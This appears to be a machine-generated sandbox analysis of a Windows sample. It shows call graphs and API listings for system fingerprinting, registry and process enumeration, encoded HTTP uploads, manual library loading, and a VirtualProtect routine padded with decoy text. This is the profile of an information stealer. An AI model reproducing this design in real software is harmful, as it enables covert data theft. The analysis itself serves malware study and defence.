lstrcpy 14876->14877 14878 c52021 14877->14878 14879 c5a9b0 4 API calls 14878->14879 14880 c52040 14879->14880 14881 c5a8a0 lstrcpy 14880->14881 14882 c52049 14881->14882 14883 c5a9b0 4 API calls 14882->14883 14884 c5206a 14883->14884 14885 c5a8a0 lstrcpy 14884->14885 14886 c52073 14885->14886 14887 c5207e GetCurrentProcessId 14886->14887 15500 c59470 OpenProcess 14887->15500 14890 c5a920 3 API calls 14891 c520a4 14890->14891 14892 c5a8a0 lstrcpy 14891->14892 14893 c520ad 14892->14893 14894 c5a9b0 4 API calls 14893->14894 14895 c520d7 14894->14895 14896 c5a8a0 lstrcpy 14895->14896 14897 c520e0 14896->14897 14898 c5a9b0 4 API calls 14897->14898 14899 c52100 14898->14899 14900 c5a8a0 lstrcpy 14899->14900 14901 c52109 14900->14901 15505 c57e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14901->15505 14904 c5a9b0 4 API calls 14905 c52129 14904->14905 14906 c5a8a0 lstrcpy 14905->14906 14907 c52132 14906->14907 14908 c5a9b0 4 API calls 14907->14908 14909 c52151 14908->14909 14910 c5a8a0 lstrcpy 14909->14910 14911 c5215a 14910->14911 14912 c5a9b0 4 API calls 14911->14912 14913 c5217b 14912->14913 14914 c5a8a0 lstrcpy 14913->14914 14915 c52184 14914->14915 15509 c57f60 14915->15509 14918 c5a9b0 4 API calls 14919 c521a4 14918->14919 14920 c5a8a0 lstrcpy 14919->14920 14921 c521ad 14920->14921 14922 c5a9b0 4 API calls 14921->14922 14923 c521cc 14922->14923 14924 c5a8a0 lstrcpy 14923->14924 14925 c521d5 14924->14925 14926 c5a9b0 4 API calls 14925->14926 14927 c521f6 14926->14927 14928 c5a8a0 lstrcpy 14927->14928 14929 c521ff 14928->14929 15522 c57ed0 GetSystemInfo wsprintfA 14929->15522 14932 c5a9b0 4 API calls 14933 c5221f 14932->14933 14934 c5a8a0 lstrcpy 14933->14934 14935 c52228 14934->14935 14936 c5a9b0 4 API calls 14935->14936 14937 c52247 14936->14937 14938 c5a8a0 lstrcpy 14937->14938 14939 c52250 14938->14939 14940 c5a9b0 4 API calls 14939->14940 14941 c52270 14940->14941 14942 c5a8a0 lstrcpy 14941->14942 14943 c52279 14942->14943 15524 c58100 GetProcessHeap 
RtlAllocateHeap 14943->15524 14946 c5a9b0 4 API calls 14947 c52299 14946->14947 14948 c5a8a0 lstrcpy 14947->14948 14949 c522a2 14948->14949 14950 c5a9b0 4 API calls 14949->14950 14951 c522c1 14950->14951 14952 c5a8a0 lstrcpy 14951->14952 14953 c522ca 14952->14953 14954 c5a9b0 4 API calls 14953->14954 14955 c522eb 14954->14955 14956 c5a8a0 lstrcpy 14955->14956 14957 c522f4 14956->14957 15530 c587c0 14957->15530 14960 c5a920 3 API calls 14961 c5231e 14960->14961 14962 c5a8a0 lstrcpy 14961->14962 14963 c52327 14962->14963 14964 c5a9b0 4 API calls 14963->14964 14965 c52351 14964->14965 14966 c5a8a0 lstrcpy 14965->14966 14967 c5235a 14966->14967 14968 c5a9b0 4 API calls 14967->14968 14969 c5237a 14968->14969 14970 c5a8a0 lstrcpy 14969->14970 14971 c52383 14970->14971 14972 c5a9b0 4 API calls 14971->14972 14973 c523a2 14972->14973 14974 c5a8a0 lstrcpy 14973->14974 14975 c523ab 14974->14975 15535 c581f0 14975->15535 14977 c523c2 14978 c5a920 3 API calls 14977->14978 14979 c523d5 14978->14979 14980 c5a8a0 lstrcpy 14979->14980 14981 c523de 14980->14981 14982 c5a9b0 4 API calls 14981->14982 14983 c5240a 14982->14983 14984 c5a8a0 lstrcpy 14983->14984 14985 c52413 14984->14985 14986 c5a9b0 4 API calls 14985->14986 14987 c52432 14986->14987 14988 c5a8a0 lstrcpy 14987->14988 14989 c5243b 14988->14989 14990 c5a9b0 4 API calls 14989->14990 14991 c5245c 14990->14991 14992 c5a8a0 lstrcpy 14991->14992 14993 c52465 14992->14993 14994 c5a9b0 4 API calls 14993->14994 14995 c52484 14994->14995 14996 c5a8a0 lstrcpy 14995->14996 14997 c5248d 14996->14997 14998 c5a9b0 4 API calls 14997->14998 14999 c524ae 14998->14999 15000 c5a8a0 lstrcpy 14999->15000 15001 c524b7 15000->15001 15543 c58320 15001->15543 15003 c524d3 15004 c5a920 3 API calls 15003->15004 15005 c524e6 15004->15005 15006 c5a8a0 lstrcpy 15005->15006 15007 c524ef 15006->15007 15008 c5a9b0 4 API calls 15007->15008 15009 c52519 15008->15009 15010 c5a8a0 lstrcpy 15009->15010 15011 c52522 15010->15011 15012 c5a9b0 4 API calls 
15011->15012 15013 c52543 15012->15013 15014 c5a8a0 lstrcpy 15013->15014 15015 c5254c 15014->15015 15016 c58320 17 API calls 15015->15016 15017 c52568 15016->15017 15018 c5a920 3 API calls 15017->15018 15019 c5257b 15018->15019 15020 c5a8a0 lstrcpy 15019->15020 15021 c52584 15020->15021 15022 c5a9b0 4 API calls 15021->15022 15023 c525ae 15022->15023 15024 c5a8a0 lstrcpy 15023->15024 15025 c525b7 15024->15025 15026 c5a9b0 4 API calls 15025->15026 15027 c525d6 15026->15027 15028 c5a8a0 lstrcpy 15027->15028 15029 c525df 15028->15029 15030 c5a9b0 4 API calls 15029->15030 15031 c52600 15030->15031 15032 c5a8a0 lstrcpy 15031->15032 15033 c52609 15032->15033 15579 c58680 15033->15579 15035 c52620 15036 c5a920 3 API calls 15035->15036 15037 c52633 15036->15037 15038 c5a8a0 lstrcpy 15037->15038 15039 c5263c 15038->15039 15040 c5265a lstrlen 15039->15040 15041 c5266a 15040->15041 15042 c5a740 lstrcpy 15041->15042 15043 c5267c 15042->15043 15044 c41590 lstrcpy 15043->15044 15045 c5268d 15044->15045 15589 c55190 15045->15589 15047 c52699 15047->13479 15777 c5aad0 15048->15777 15050 c45009 InternetOpenUrlA 15054 c45021 15050->15054 15051 c450a0 InternetCloseHandle InternetCloseHandle 15053 c450ec 15051->15053 15052 c4502a InternetReadFile 15052->15054 15053->13483 15054->15051 15054->15052 15778 c498d0 15055->15778 15057 c50759 15058 c5077d 15057->15058 15059 c50a38 15057->15059 15062 c50799 StrCmpCA 15058->15062 15060 c41590 lstrcpy 15059->15060 15061 c50a49 15060->15061 15954 c50250 15061->15954 15064 c507a8 15062->15064 15090 c50843 15062->15090 15066 c5a7a0 lstrcpy 15064->15066 15068 c507c3 15066->15068 15067 c50865 StrCmpCA 15069 c50874 15067->15069 15071 c5096b 15067->15071 15070 c41590 lstrcpy 15068->15070 15072 c5a740 lstrcpy 15069->15072 15073 c5080c 15070->15073 15074 c5099c StrCmpCA 15071->15074 15075 c50881 15072->15075 15076 c5a7a0 lstrcpy 15073->15076 15077 c50a2d 15074->15077 15078 c509ab 15074->15078 15079 c5a9b0 4 API calls 15075->15079 15080 c50823 
15076->15080 15077->13487 15081 c41590 lstrcpy 15078->15081 15082 c508ac 15079->15082 15083 c5a7a0 lstrcpy 15080->15083 15085 c509f4 15081->15085 15086 c5a920 3 API calls 15082->15086 15084 c5083e 15083->15084 15781 c4fb00 15084->15781 15088 c5a7a0 lstrcpy 15085->15088 15089 c508b3 15086->15089 15091 c50a0d 15088->15091 15092 c5a9b0 4 API calls 15089->15092 15090->15067 15093 c5a7a0 lstrcpy 15091->15093 15094 c508ba 15092->15094 15095 c50a28 15093->15095 15096 c5a8a0 lstrcpy 15094->15096 15897 c50030 15095->15897 15429 c5a7a0 lstrcpy 15428->15429 15430 c41683 15429->15430 15431 c5a7a0 lstrcpy 15430->15431 15432 c41695 15431->15432 15433 c5a7a0 lstrcpy 15432->15433 15434 c416a7 15433->15434 15435 c5a7a0 lstrcpy 15434->15435 15436 c415a3 15435->15436 15436->14310 15438 c447c6 15437->15438 15439 c44838 lstrlen 15438->15439 15463 c5aad0 15439->15463 15441 c44848 InternetCrackUrlA 15442 c44867 15441->15442 15442->14387 15444 c5a740 lstrcpy 15443->15444 15445 c58b74 15444->15445 15446 c5a740 lstrcpy 15445->15446 15447 c58b82 GetSystemTime 15446->15447 15449 c58b99 15447->15449 15448 c5a7a0 lstrcpy 15450 c58bfc 15448->15450 15449->15448 15450->14402 15452 c5a931 15451->15452 15453 c5a988 15452->15453 15455 c5a968 lstrcpy lstrcat 15452->15455 15454 c5a7a0 lstrcpy 15453->15454 15456 c5a994 15454->15456 15455->15453 15456->14405 15457->14520 15459 c49af9 LocalAlloc 15458->15459 15460 c44eee 15458->15460 15459->15460 15461 c49b14 CryptStringToBinaryA 15459->15461 15460->14408 15460->14410 15461->15460 15462 c49b39 LocalFree 15461->15462 15462->15460 15463->15441 15464->14530 15465->14671 15466->14673 15467->14681 15596 c577a0 15468->15596 15471 c576c6 RegOpenKeyExA 15473 c57704 RegCloseKey 15471->15473 15474 c576e7 RegQueryValueExA 15471->15474 15472 c51c1e 15472->14763 15473->15472 15474->15473 15476 c51c99 15475->15476 15476->14777 15478 c51e09 15477->15478 15478->14819 15480 c51e84 15479->15480 15481 c57a9a wsprintfA 15479->15481 15480->14833 15481->15480 15483 c57b4d 
15482->15483 15484 c51efe 15482->15484 15603 c58d20 LocalAlloc CharToOemW 15483->15603 15484->14847 15487 c5a740 lstrcpy 15486->15487 15488 c57bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15487->15488 15497 c57c25 15488->15497 15489 c57c46 GetLocaleInfoA 15489->15497 15490 c57d18 15491 c57d1e LocalFree 15490->15491 15492 c57d28 15490->15492 15491->15492 15494 c5a7a0 lstrcpy 15492->15494 15493 c5a9b0 lstrcpy lstrlen lstrcpy lstrcat 15493->15497 15496 c57d37 15494->15496 15495 c5a8a0 lstrcpy 15495->15497 15496->14860 15497->15489 15497->15490 15497->15493 15497->15495 15499 c52008 15498->15499 15499->14875 15501 c594b5 15500->15501 15502 c59493 GetModuleFileNameExA CloseHandle 15500->15502 15503 c5a740 lstrcpy 15501->15503 15502->15501 15504 c52091 15503->15504 15504->14890 15506 c52119 15505->15506 15507 c57e68 RegQueryValueExA 15505->15507 15506->14904 15508 c57e8e RegCloseKey 15507->15508 15508->15506 15510 c57fb9 GetLogicalProcessorInformationEx 15509->15510 15511 c57fd8 GetLastError 15510->15511 15512 c58029 15510->15512 15514 c58022 15511->15514 15521 c57fe3 15511->15521 15517 c589f0 2 API calls 15512->15517 15515 c52194 15514->15515 15518 c589f0 2 API calls 15514->15518 15515->14918 15519 c5807b 15517->15519 15518->15515 15519->15514 15520 c58084 wsprintfA 15519->15520 15520->15515 15521->15510 15521->15515 15604 c589f0 15521->15604 15607 c58a10 GetProcessHeap RtlAllocateHeap 15521->15607 15523 c5220f 15522->15523 15523->14932 15525 c589b0 15524->15525 15526 c5814d GlobalMemoryStatusEx 15525->15526 15527 c58163 __aulldiv 15526->15527 15528 c5819b wsprintfA 15527->15528 15529 c52289 15528->15529 15529->14946 15531 c587fb GetProcessHeap RtlAllocateHeap wsprintfA 15530->15531 15533 c5a740 lstrcpy 15531->15533 15534 c5230b 15533->15534 15534->14960 15536 c5a740 lstrcpy 15535->15536 15537 c58229 15536->15537 15538 c58263 15537->15538 15541 c5a9b0 lstrcpy lstrlen lstrcpy lstrcat 15537->15541 15542 c5a8a0 lstrcpy 15537->15542 15539 c5a7a0 lstrcpy 
15538->15539 15540 c582dc 15539->15540 15540->14977 15541->15537 15542->15537 15544 c5a740 lstrcpy 15543->15544 15545 c5835c RegOpenKeyExA 15544->15545 15546 c583d0 15545->15546 15547 c583ae 15545->15547 15549 c58613 RegCloseKey 15546->15549 15550 c583f8 RegEnumKeyExA 15546->15550 15548 c5a7a0 lstrcpy 15547->15548 15560 c583bd 15548->15560 15551 c5a7a0 lstrcpy 15549->15551 15552 c5843f wsprintfA RegOpenKeyExA 15550->15552 15553 c5860e 15550->15553 15551->15560 15554 c58485 RegCloseKey RegCloseKey 15552->15554 15555 c584c1 RegQueryValueExA 15552->15555 15553->15549 15558 c5a7a0 lstrcpy 15554->15558 15556 c58601 RegCloseKey 15555->15556 15557 c584fa lstrlen 15555->15557 15556->15553 15557->15556 15559 c58510 15557->15559 15558->15560 15561 c5a9b0 4 API calls 15559->15561 15560->15003 15562 c58527 15561->15562 15563 c5a8a0 lstrcpy 15562->15563 15564 c58533 15563->15564 15565 c5a9b0 4 API calls 15564->15565 15566 c58557 15565->15566 15567 c5a8a0 lstrcpy 15566->15567 15568 c58563 15567->15568 15569 c5856e RegQueryValueExA 15568->15569 15569->15556 15570 c585a3 15569->15570 15571 c5a9b0 4 API calls 15570->15571 15572 c585ba 15571->15572 15573 c5a8a0 lstrcpy 15572->15573 15574 c585c6 15573->15574 15575 c5a9b0 4 API calls 15574->15575 15576 c585ea 15575->15576 15577 c5a8a0 lstrcpy 15576->15577 15578 c585f6 15577->15578 15578->15556 15580 c5a740 lstrcpy 15579->15580 15581 c586bc CreateToolhelp32Snapshot Process32First 15580->15581 15582 c5875d CloseHandle 15581->15582 15583 c586e8 Process32Next 15581->15583 15584 c5a7a0 lstrcpy 15582->15584 15583->15582 15588 c586fd 15583->15588 15587 c58776 15584->15587 15585 c5a9b0 lstrcpy lstrlen lstrcpy lstrcat 15585->15588 15586 c5a8a0 lstrcpy 15586->15588 15587->15035 15588->15583 15588->15585 15588->15586 15590 c5a7a0 lstrcpy 15589->15590 15591 c551b5 15590->15591 15592 c41590 lstrcpy 15591->15592 15593 c551c6 15592->15593 15608 c45100 15593->15608 15595 c551cf 15595->15047 15599 c57720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 
15596->15599 15598 c576b9 15598->15471 15598->15472 15600 c57765 RegQueryValueExA 15599->15600 15601 c57780 RegCloseKey 15599->15601 15600->15601 15602 c57793 15601->15602 15602->15598 15603->15484 15605 c58a0c 15604->15605 15606 c589f9 GetProcessHeap HeapFree 15604->15606 15605->15521 15606->15605 15607->15521 15609 c5a7a0 lstrcpy 15608->15609 15610 c45119 15609->15610 15611 c447b0 2 API calls 15610->15611 15612 c45125 15611->15612 15768 c58ea0 15612->15768 15614 c45184 15615 c45192 lstrlen 15614->15615 15616 c451a5 15615->15616 15617 c58ea0 4 API calls 15616->15617 15618 c451b6 15617->15618 15619 c5a740 lstrcpy 15618->15619 15620 c451c9 15619->15620 15621 c5a740 lstrcpy 15620->15621 15622 c451d6 15621->15622 15623 c5a740 lstrcpy 15622->15623 15624 c451e3 15623->15624 15625 c5a740 lstrcpy 15624->15625 15626 c451f0 15625->15626 15627 c5a740 lstrcpy 15626->15627 15628 c451fd InternetOpenA StrCmpCA 15627->15628 15629 c4522f 15628->15629 15630 c458c4 InternetCloseHandle 15629->15630 15631 c58b60 3 API calls 15629->15631 15637 c458d9 codecvt 15630->15637 15632 c4524e 15631->15632 15633 c5a920 3 API calls 15632->15633 15634 c45261 15633->15634 15635 c5a8a0 lstrcpy 15634->15635 15636 c4526a 15635->15636 15638 c5a9b0 4 API calls 15636->15638 15641 c5a7a0 lstrcpy 15637->15641 15639 c452ab 15638->15639 15640 c5a920 3 API calls 15639->15640 15642 c452b2 15640->15642 15648 c45913 15641->15648 15643 c5a9b0 4 API calls 15642->15643 15644 c452b9 15643->15644 15645 c5a8a0 lstrcpy 15644->15645 15646 c452c2 15645->15646 15647 c5a9b0 4 API calls 15646->15647 15649 c45303 15647->15649 15648->15595 15650 c5a920 3 API calls 15649->15650 15651 c4530a 15650->15651 15652 c5a8a0 lstrcpy 15651->15652 15653 c45313 15652->15653 15654 c45329 InternetConnectA 15653->15654 15654->15630 15655 c45359 HttpOpenRequestA 15654->15655 15657 c458b7 InternetCloseHandle 15655->15657 15658 c453b7 15655->15658 15657->15630 15659 c5a9b0 4 API calls 15658->15659 15660 c453cb 15659->15660 15661 c5a8a0 lstrcpy 
15660->15661 15662 c453d4 15661->15662 15663 c5a920 3 API calls 15662->15663 15664 c453f2 15663->15664 15665 c5a8a0 lstrcpy 15664->15665 15666 c453fb 15665->15666 15667 c5a9b0 4 API calls 15666->15667 15668 c4541a 15667->15668 15669 c5a8a0 lstrcpy 15668->15669 15670 c45423 15669->15670 15671 c5a9b0 4 API calls 15670->15671 15672 c45444 15671->15672 15673 c5a8a0 lstrcpy 15672->15673 15674 c4544d 15673->15674 15675 c5a9b0 4 API calls 15674->15675 15676 c4546e 15675->15676 15677 c5a8a0 lstrcpy 15676->15677 15769 c58ead CryptBinaryToStringA 15768->15769 15770 c58ea9 15768->15770 15769->15770 15771 c58ece GetProcessHeap RtlAllocateHeap 15769->15771 15770->15614 15771->15770 15772 c58ef4 codecvt 15771->15772 15773 c58f05 CryptBinaryToStringA 15772->15773 15773->15770 15777->15050 16020 c49880 15778->16020 15780 c498e1 15780->15057 15782 c5a740 lstrcpy 15781->15782 15783 c4fb16 15782->15783 15955 c5a740 lstrcpy 15954->15955 15956 c50266 15955->15956 15957 c58de0 2 API calls 15956->15957 15958 c5027b 15957->15958 15959 c5a920 3 API calls 15958->15959 15960 c5028b 15959->15960 15961 c5a8a0 lstrcpy 15960->15961 15962 c50294 15961->15962 15963 c5a9b0 4 API calls 15962->15963 15964 c502b8 15963->15964 16021 c4988e 16020->16021 16024 c46fb0 16021->16024 16023 c498ad codecvt 16023->15780 16027 c46d40 16024->16027 16028 c46d59 16027->16028 16029 c46d63 16027->16029 16028->16023 16029->16028 16041 c46660 16029->16041 16031 c46dbe 16031->16028 16047 c469b0 16031->16047 16033 c46e2a 16033->16028 16034 c46ee6 VirtualFree 16033->16034 16035 c46ef7 16033->16035 16034->16035 16036 c46f26 FreeLibrary 16035->16036 16037 c46f38 16035->16037 16040 c46f41 16035->16040 16036->16035 16039 c589f0 2 API calls 16037->16039 16038 c589f0 2 API calls 16038->16028 16039->16040 16040->16028 16040->16038 16044 c4668f VirtualAlloc 16041->16044 16043 c46730 16045 c46743 VirtualAlloc 16043->16045 16046 c4673c 16043->16046 16044->16043 16044->16046 16045->16046 16046->16031 16048 c469c9 16047->16048 16052 
c469d5 16047->16052 16049 c46a09 LoadLibraryA 16048->16049 16048->16052 16050 c46a32 16049->16050 16049->16052 16056 c46ae0 16050->16056 16057 c58a10 GetProcessHeap RtlAllocateHeap 16050->16057 16052->16033 16053 c46ba8 GetProcAddress 16053->16052 16053->16056 16054 c589f0 2 API calls 16054->16056 16055 c46a8b 16055->16052 16055->16054 16056->16052 16056->16053 16057->16055

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 660 c59860-c59874 call c59750 663 c59a93-c59af2 LoadLibraryA * 5 660->663 664 c5987a-c59a8e call c59780 GetProcAddress * 21 660->664 666 c59af4-c59b08 GetProcAddress 663->666 667 c59b0d-c59b14 663->667 664->663 666->667 669 c59b46-c59b4d 667->669 670 c59b16-c59b41 GetProcAddress * 2 667->670 671 c59b4f-c59b63 GetProcAddress 669->671 672 c59b68-c59b6f 669->672 670->669 671->672 673 c59b71-c59b84 GetProcAddress 672->673 674 c59b89-c59b90 672->674 673->674 675 c59bc1-c59bc2 674->675 676 c59b92-c59bbc GetProcAddress * 2 674->676 676->675
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,00894178), ref: 00C598A1
                        • GetProcAddress.KERNEL32(74DD0000,008940E8), ref: 00C598BA
                        • GetProcAddress.KERNEL32(74DD0000,00894130), ref: 00C598D2
                        • GetProcAddress.KERNEL32(74DD0000,008941C0), ref: 00C598EA
                        • GetProcAddress.KERNEL32(74DD0000,008941D8), ref: 00C59903
                        • GetProcAddress.KERNEL32(74DD0000,0089ADE8), ref: 00C5991B
                        • GetProcAddress.KERNEL32(74DD0000,008876D0), ref: 00C59933
                        • GetProcAddress.KERNEL32(74DD0000,008876F0), ref: 00C5994C
                        • GetProcAddress.KERNEL32(74DD0000,00893F98), ref: 00C59964
                        • GetProcAddress.KERNEL32(74DD0000,00893FE0), ref: 00C5997C
                        • GetProcAddress.KERNEL32(74DD0000,00894028), ref: 00C59995
                        • GetProcAddress.KERNEL32(74DD0000,00893FB0), ref: 00C599AD
                        • GetProcAddress.KERNEL32(74DD0000,00887650), ref: 00C599C5
                        • GetProcAddress.KERNEL32(74DD0000,00894058), ref: 00C599DE
                        • GetProcAddress.KERNEL32(74DD0000,00894088), ref: 00C599F6
                        • GetProcAddress.KERNEL32(74DD0000,00887550), ref: 00C59A0E
                        • GetProcAddress.KERNEL32(74DD0000,00894100), ref: 00C59A27
                        • GetProcAddress.KERNEL32(74DD0000,00894118), ref: 00C59A3F
                        • GetProcAddress.KERNEL32(74DD0000,008876B0), ref: 00C59A57
                        • GetProcAddress.KERNEL32(74DD0000,00894160), ref: 00C59A70
                        • GetProcAddress.KERNEL32(74DD0000,00887730), ref: 00C59A88
                        • LoadLibraryA.KERNEL32(00894340,?,00C56A00), ref: 00C59A9A
                        • LoadLibraryA.KERNEL32(00894358,?,00C56A00), ref: 00C59AAB
                        • LoadLibraryA.KERNEL32(00894298,?,00C56A00), ref: 00C59ABD
                        • LoadLibraryA.KERNEL32(008942C8,?,00C56A00), ref: 00C59ACF
                        • LoadLibraryA.KERNEL32(008942E0,?,00C56A00), ref: 00C59AE0
                        • GetProcAddress.KERNEL32(75A70000,00894328), ref: 00C59B02
                        • GetProcAddress.KERNEL32(75290000,008942B0), ref: 00C59B23
                        • GetProcAddress.KERNEL32(75290000,008942F8), ref: 00C59B3B
                        • GetProcAddress.KERNEL32(75BD0000,00894310), ref: 00C59B5D
                        • GetProcAddress.KERNEL32(75450000,008874D0), ref: 00C59B7E
                        • GetProcAddress.KERNEL32(76E90000,0089ACE8), ref: 00C59B9F
                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00C59BB6
                        Strings
                        • NtQueryInformationProcess, xrefs: 00C59BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: ed781428544aa805ecfe5a3e5d80ce08d9e4eb0c6adeef132ad7a8ab9320a687
                        • Instruction ID: 9459d7f4457c246f83f4e1fd5aa41ec282283444539945193c906e00c9b77dd9
                        • Opcode Fuzzy Hash: ed781428544aa805ecfe5a3e5d80ce08d9e4eb0c6adeef132ad7a8ab9320a687
                        • Instruction Fuzzy Hash: D6A14DB55006009FF358EFAAFD8895637F9F74C70170C453BA60DB3264D63AA44AEB22

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 764 c445c0-c44695 RtlAllocateHeap 781 c446a0-c446a6 764->781 782 c446ac-c4474a 781->782 783 c4474f-c447a9 VirtualProtect 781->783 782->781
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C4460F
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00C4479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44678
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44643
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C4473F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44683
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C445C7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C4477B
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44713
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C446C2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C446B7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C4466D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C446CD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C446D8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44617
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44729
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C4475A
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C4474F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44662
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C445D2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44770
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C4471E
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44765
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C445F3
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C445DD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44657
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C446AC
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44638
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44622
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C4462D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44734
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C445E8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
